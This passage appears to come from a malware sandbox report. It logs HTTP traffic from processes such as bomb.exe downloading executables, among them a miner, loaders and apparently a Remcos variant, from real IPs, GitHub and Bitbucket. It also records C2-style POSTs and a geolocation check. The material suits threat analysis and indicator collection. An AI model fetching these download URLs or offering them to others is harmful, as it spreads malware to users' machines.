ETag: "6733d71b-13c00"
Accept-Ranges: bytes
GET

http://twizt.net/peinstall.php

http185.215.113.66pei.exe.exe

Remote address:

185.215.113.66:80

Request

GET /peinstall.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Host: twizt.net

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Feb 2025 16:35:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://185.215.113.97/files/carnagedata/Installer.exe

bomb.exe

Remote address:

185.215.113.97:80

Request

GET /files/carnagedata/Installer.exe HTTP/1.1
Host: 185.215.113.97
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Feb 2025 16:35:19 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
GET

http://217.154.84.12/223/SW/new_image.jpg

bomb.exe

Remote address:

217.154.84.12:80

Request

GET /223/SW/new_image.jpg HTTP/1.1
Host: 217.154.84.12
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 22 Feb 2025 16:35:19 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Fri, 21 Feb 2025 11:21:27 GMT
ETag: "37caff-62ea5310dccb5"
Accept-Ranges: bytes
Content-Length: 3656447
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/jpeg
GET

https://projectprocurements.com/Unifev.jpg

bomb.exe

Remote address:

69.57.163.218:443

Request

GET /Unifev.jpg HTTP/1.1
Host: projectprocurements.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 22 Feb 2025 16:35:19 GMT
Content-Type: image/jpeg
Content-Length: 3657127
Last-Modified: Thu, 20 Feb 2025 13:04:06 GMT
Connection: keep-alive
ETag: "67b72846-37cda7"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Strict-Transport-Security: max-age=31536000;
Accept-Ranges: bytes
GET

http://185.215.113.66/1

sysnldcvmr.exe

Remote address:

185.215.113.66:80

Request

GET /1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: 185.215.113.66

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Feb 2025 16:35:20 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
GET

http://185.215.113.66/2

sysnldcvmr.exe

Remote address:

185.215.113.66:80

Request

GET /2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: 185.215.113.66

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Feb 2025 16:35:22 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
GET

http://185.215.113.66/3

sysnldcvmr.exe

Remote address:

185.215.113.66:80

Request

GET /3 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: 185.215.113.66

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Feb 2025 16:35:25 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
GET

http://185.215.113.66/4

sysnldcvmr.exe

Remote address:

185.215.113.66:80

Request

GET /4 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: 185.215.113.66

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Feb 2025 16:35:28 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
GET

http://185.215.113.66/5

sysnldcvmr.exe

Remote address:

185.215.113.66:80

Request

GET /5 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: 185.215.113.66

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Feb 2025 16:35:31 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
GET

https://github.com/Lean789/rueht/raw/refs/heads/main/Mizedo.exe

bomb.exe

Remote address:

20.26.156.215:443

Request

GET /Lean789/rueht/raw/refs/heads/main/Mizedo.exe HTTP/1.1
Host: github.com

Response

HTTP/1.1 302 Found

Server: GitHub.com
Date: Sat, 22 Feb 2025 16:35:13 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
Access-Control-Allow-Origin:
Location: https://raw.githubusercontent.com/Lean789/rueht/refs/heads/main/Mizedo.exe
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
Content-Length: 0
X-GitHub-Request-Id: 63AA:3C1622:6F1EA4:93E082:67B9FCC8
GET

https://github.com/Lean789/rueht/raw/refs/heads/main/xmrig.exe

bomb.exe

Remote address:

20.26.156.215:443

Request

GET /Lean789/rueht/raw/refs/heads/main/xmrig.exe HTTP/1.1
Host: github.com

Response

HTTP/1.1 302 Found

Server: GitHub.com
Date: Sat, 22 Feb 2025 16:35:15 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
Access-Control-Allow-Origin:
Location: https://raw.githubusercontent.com/Lean789/rueht/refs/heads/main/xmrig.exe
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
Content-Length: 0
X-GitHub-Request-Id: 63AA:3C1622:6F1EAC:93E08C:67B9FCC8
DNS

bomb.exe

Remote address:

20.26.156.215:443

Response

HTTP/1.1 302 Found

Server: GitHub.com
Date: Sat, 22 Feb 2025 16:35:18 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
Access-Control-Allow-Origin:
Location: https://raw.githubusercontent.com/Lean789/rueht/refs/heads/main/toyour.exe
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
Content-Length: 0
X-GitHub-Request-Id: 63AA:3C1622:6F1F1C:93E114:67B9FCC8
GET

http://147.45.44.68/ls/rwva.exe

bomb.exe

Remote address:

147.45.44.68:80

Request

GET /ls/rwva.exe HTTP/1.1
Host: 147.45.44.68
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 22 Feb 2025 16:35:22 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Wed, 29 Jan 2025 17:50:33 GMT
ETag: "f9-62cdbf23fd7a4"
Accept-Ranges: bytes
Content-Length: 249
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
GET

http://162.230.48.189/uploads/A.exe

bomb.exe

Remote address:

162.230.48.189:80

Request

GET /uploads/A.exe HTTP/1.1
Host: 162.230.48.189
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 22 Feb 2025 16:35:23 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Thu, 12 Dec 2024 10:57:10 GMT
ETag: "379400-62910937b8f6b"
Accept-Ranges: bytes
Content-Length: 3642368
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
GET

http://162.230.48.189/uploads/DL.exe

bomb.exe

Remote address:

162.230.48.189:80

Request

GET /uploads/DL.exe HTTP/1.1
Host: 162.230.48.189
GET

http://162.230.48.189/uploads/B.exe

bomb.exe

Remote address:

162.230.48.189:80

Request

GET /uploads/B.exe HTTP/1.1
Host: 162.230.48.189

Response

HTTP/1.1 200 OK

Date: Sat, 22 Feb 2025 16:35:23 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Sun, 08 Sep 2024 09:42:30 GMT
ETag: "335600-6219875824f66"
Accept-Ranges: bytes
Content-Length: 3364352
Content-Type: application/x-msdownload
GET

http://162.230.48.189/uploads/WinZip.exe

bomb.exe

Remote address:

162.230.48.189:80

Request

GET /uploads/WinZip.exe HTTP/1.1
Host: 162.230.48.189
GET

http://196.251.92.64/resh/Client.exe

bomb.exe

Remote address:

196.251.92.64:80

Request

GET /resh/Client.exe HTTP/1.1
Host: 196.251.92.64
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 22 Feb 2025 16:35:22 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Wed, 19 Feb 2025 15:39:21 GMT
ETag: "2fdc00-62e808fb242bd"
Accept-Ranges: bytes
Content-Length: 3136512
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
GET

http://196.251.92.64/resh/build.exe

bomb.exe

Remote address:

196.251.92.64:80

Request

GET /resh/build.exe HTTP/1.1
Host: 196.251.92.64
GET

http://196.251.92.64/resh/Devil2.exe

bomb.exe

Remote address:

196.251.92.64:80

Request

GET /resh/Devil2.exe HTTP/1.1
Host: 196.251.92.64
GET

http://196.251.92.64/crypt/BREMCOS.exe

bomb.exe

Remote address:

196.251.92.64:80

Request

GET /crypt/BREMCOS.exe HTTP/1.1
Host: 196.251.92.64
GET

http://162.230.48.189/uploads/DL.exe

bomb.exe

Remote address:

162.230.48.189:80

Request

GET /uploads/DL.exe HTTP/1.1
Host: 162.230.48.189

Response

HTTP/1.1 200 OK

Date: Sat, 22 Feb 2025 16:35:31 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Thu, 20 Feb 2025 19:36:55 GMT
ETag: "4200-62e97ff25b168"
Accept-Ranges: bytes
Content-Length: 16896
Content-Type: application/x-msdownload
POST

http://176.65.144.135:65012/

http196.251.92.64reshbuild.exe.exe

Remote address:

176.65.144.135:65012

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
Host: 176.65.144.135:65012
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Length: 212
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Sat, 22 Feb 2025 16:35:32 GMT
POST

http://176.65.144.135:65012/

http196.251.92.64reshbuild.exe.exe

Remote address:

176.65.144.135:65012

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
Host: 176.65.144.135:65012
Content-Length: 144
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Content-Length: 4744
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Sat, 22 Feb 2025 16:35:38 GMT
GET

https://book.rollingvideogames.com/temp/yoda.exe

bomb.exe

Remote address:

23.235.202.121:443

Request

GET /temp/yoda.exe HTTP/1.1
Host: book.rollingvideogames.com
Connection: Keep-Alive

Response

HTTP/1.1 406 Not Acceptable

Date: Sat, 22 Feb 2025 16:35:31 GMT
Server: Apache
Content-Length: 300
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
GET

http://77.105.161.58/files/loader.exe

bomb.exe

Remote address:

77.105.161.58:80

Request

GET /files/loader.exe HTTP/1.1
Host: 77.105.161.58
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 22 Feb 2025 16:35:31 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Thu, 20 Feb 2025 09:16:09 GMT
ETag: "63c295-62e8f53136bb2"
Accept-Ranges: bytes
Content-Length: 6537877
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
GET

https://bitbucket.org/fghhhhhhh/vdffgd/downloads/test.jpg?137113

bomb.exe

Remote address:

185.166.142.21:443

Request

GET /fghhhhhhh/vdffgd/downloads/test.jpg?137113 HTTP/1.1
Host: bitbucket.org
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Sat, 22 Feb 2025 16:35:32 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 15225
Server: AtlassianEdge
Vary: authorization, cookie, user-context, Accept-Language, Origin, Accept-Encoding
X-Used-Mesh: False
Content-Language: en
X-View-Name: bitbucket.apps.downloads.views.download_file
Etag: "eb596febf4f5da475ec24aeedaa93625"
X-Dc-Location: Micros-3
X-Served-By: 17073876a2c2
X-Version: 284625a40f36
X-Static-Version: 284625a40f36
X-Request-Count: 1938
X-Render-Time: 0.060506582260131836
X-B3-Traceid: 277e0e137b0b43ed9ff74e8d05dddea4
X-B3-Spanid: 3259b37b83e71a08
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; object-src 'none'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net app.pendo.io cdn.pendo.io data.pendo.io pendo-io-static.storage.googleapis.com pendo-static-6291417196199936.storage.googleapis.com https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ 'nonce-dLLdfUkbJcU5FfeFDzr2lw=='; base-uri 'self'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net app.pendo.io cdn.pendo.io pendo-static-6291417196199936.storage.googleapis.com https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org app.pendo.io; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com app.pendo.io data.pendo.io pendo-static-6291417196199936.storage.googleapis.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
X-Usage-Quota-Remaining: 998388.947
X-Usage-Request-Cost: 1628.10
X-Usage-User-Time: 0.048843
X-Usage-System-Time: 0.000000
X-Usage-Input-Ops: 0
X-Usage-Output-Ops: 0
Cache-Control: max-age=900
Age: 669
X-Cache: HIT
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
Atl-Traceid: 3b5d7f2be14f4b24b57934351874894f
Atl-Request-Id: 3b5d7f2b-e14f-4b24-b579-34351874894f
Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
Server-Timing: atl-edge;dur=71,atl-edge-internal;dur=3,atl-edge-upstream;dur=69,atl-edge-pop;desc="aws-eu-west-1"
GET

http://77.105.161.58/files/1.exe

bomb.exe

Remote address:

77.105.161.58:80

Request

GET /files/1.exe HTTP/1.1
Host: 77.105.161.58

Response

HTTP/1.1 200 OK

Date: Sat, 22 Feb 2025 16:35:32 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Thu, 20 Feb 2025 07:51:59 GMT
ETag: "2de00-62e8e261ccdfc"
Accept-Ranges: bytes
Content-Length: 187904
Content-Type: application/x-msdos-program
GET

http://85.209.128.206/Downloads/VirtualPR.exe

bomb.exe

Remote address:

85.209.128.206:80

Request

GET /Downloads/VirtualPR.exe HTTP/1.1
Host: 85.209.128.206
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Content-Length: 2715648
Content-Type: application/x-ms-dos-executable
Etag: "1825fd9a050b9200297000"
Last-Modified: Thu, 20 Feb 2025 18:21:09 GMT
Date: Sat, 22 Feb 2025 16:35:33 GMT
GET

http://91.202.233.141/1

sysnldcvmr.exe

Remote address:

91.202.233.141:80

Request

GET /1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: 91.202.233.141

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Feb 2025 16:35:39 GMT
Content-Type: application/octet-stream
Content-Length: 36608
Last-Modified: Fri, 21 Feb 2025 08:31:17 GMT
Connection: keep-alive
ETag: "67b839d5-8f00"
Accept-Ranges: bytes
POST

http://sebel.sbs/Devil/PWS/fre.php

http196.251.92.64reshDevil2.exe.exe

Remote address:

172.67.186.47:80

Request

POST /Devil/PWS/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: sebel.sbs
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: D5279B40
Content-Length: 180
Connection: close

Response

HTTP/1.1 404 Not Found

Date: Sat, 22 Feb 2025 16:35:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Status: 404 Not Found
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZxOOn3olB%2FpfFK1BB9ebQsx811g%2F2UvGItY1YVI6uTiaTaQjHnN2xz3dpuj2wXSI7iULMUU6fFXus58NJpqZ4OTw3RcLagPZR7WdiI3%2BSaS7qR5r4zXk4j5Ft2A%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 916063f5fbd36431-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=43331&min_rtt=43331&rtt_var=21665&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=419&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
GET

http://geoplugin.net/json.gp

http196.251.92.64cryptBREMCOS.exe.exe

Remote address:

178.237.33.50:80

Request

GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

date: Sat, 22 Feb 2025 16:35:38 GMT
server: Apache
content-length: 956
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
GET

http://162.230.48.189/uploads/WinZip.exe

